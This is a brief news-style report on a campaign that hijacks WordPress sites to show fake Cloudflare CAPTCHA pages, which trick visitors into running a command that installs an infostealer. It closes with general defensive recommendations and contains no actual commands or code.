Crooks Compromise WordPress Sites to Push Infostealers via Fake CAPTCHA Prompts

WordPress powers roughly 43% of all websites, making it an attractive foothold for threat actors seeking mass distribution. By compromising the content management system rather than building new malicious domains, attackers inherit the trust and SEO ranking of established sites. This supply‑chain approach also evades many perimeter defenses that prioritize unknown or newly registered URLs. Rapid7’s findings that more than 250 WordPress installations in twelve nations have been hijacked underscore how automation can scale a single exploit across a global web ecosystem.

The campaign weaponizes a counterfeit Cloudflare CAPTCHA page, a familiar barrier that users routinely dismiss. Instead of a simple checkbox, the page instructs visitors to copy a shell command and run it locally, masquerading as a verification step. This mirrors the ClickFix social‑engineering playbook, where attackers convince victims they are fixing a security warning. Because the prompt appears on a legitimate domain, browsers and security tools often treat it as benign, dramatically raising the success rate of the command‑execution trick and delivering the infostealer payload directly onto the victim’s machine.

Beyond the immediate infection, the harvested credentials feed a thriving underground market where other criminals purchase ready‑made access to email, corporate networks, and cryptocurrency wallets. This commoditization accelerates breach cycles and forces organizations to treat third‑party site compromise as a supply‑chain risk. Defenders should prioritize hardening WordPress installations—regular patching, principle‑of‑least‑privilege plugins, and integrity monitoring—to disrupt the initial foothold. Additionally, endpoint security that blocks unknown command execution and network filters that detect anomalous outbound connections can blunt the infostealer’s exfiltration stage, reducing overall impact.